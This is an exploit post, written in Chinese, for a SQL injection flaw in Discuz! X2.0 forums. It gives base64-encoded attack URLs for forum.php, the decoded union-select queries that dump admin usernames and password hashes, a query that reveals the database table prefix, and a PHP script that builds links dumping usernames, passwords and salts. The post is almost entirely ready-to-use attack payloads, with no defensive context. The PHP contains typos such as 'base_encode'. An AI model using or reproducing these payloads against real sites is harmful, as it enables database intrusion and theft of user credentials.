Discuz! X2.0 SQL注入漏洞 EXP

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

base解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where  username like ‘admin|x|y

如果不是默认前缀

暴前缀EXP

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

 ———————–

再贴个PHP的EXP

$host=”http://X2.0论坛地址”;

$affuser=”要爆的用户名username”;

echo ‘echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆前缀’;

echo “
”;

echo ‘echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt’;

?>